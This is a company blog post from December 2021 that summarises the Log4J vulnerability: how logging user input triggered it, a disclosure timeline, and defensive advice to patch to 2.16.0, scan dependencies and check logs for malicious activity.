Blog

Log4J Security Issue

This post is a quick summary around the Log4J security issues happening in December 2021.
It includes a summary, a video, a PDF of slides we presented and extensive references.

The TL;DR is: update Log4J to 2.16.0 and keep watching for subsequent updates.

The 10,000 Foot View Summary of The Issue

Log4J is a widely used Java library.

It has a problem where if it is asked to process a malicious string, it will allow
an attacker to run their own code on a targeted server. This can happen in both
authenticated (where we know the user) and unauthenticated (anonymous) cases depending
on the application.

This issue is being actively probed and attacked.

The simplest fix is to patch. I expect further developments, so I recommend watching
for additional updates.

The Rough Detail

Log4J is a logging library that is used in a wide array of applications. I probably used it in
over half of the projects I’ve worked on in my career.

It is very normal for a developer to want to log something that a user enters. For example:

String user = getCurrentUser();
String document = request.getParameter("Document");
Logger logger = LogManager.getLogger(Thing.class.getName());
logger.debug("User {} requested document: {}", user, document);

That log statement where the user and document get put into a log statement is where the problem
occurs. One clear problem is that these statements are basically everywhere in code and it
would be nearly impossible to audit all of them.

The fix is basically to use a version of Log4J that doesn’t do the magic on the malicious
string by default. Alternatives are to tell an older version you don’t want that feature. Or
in extreme cases to rip the offending class right out of the log4j library.

There are a variety of ways to scan for the issue, and to identify log4j libary versions
locally. Even a simple approach of looking at dependencies could help.

Timeline

The vulnerability was disclosed to the Apache Log4J security team 11/24.

It was released to the public 12/10.

Patches 2.15.0 and 2.16.0 have been release since then.

I would look in log files from November forward for malicious activity as soon as possible.

A Video

I put together this 17 minute video overview that covers:

  • The issue
  • The payload
  • Fixes
  • Things you want to check
  • References

The Slides

If you want to read and navigate yourself, the slides are here.

References

We looked at a lot of sources as we navigated this issue. Here are some that we thought were helpful:

Menu
Menu
© 2019-2022 Jemurai. All rights reserved.
linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram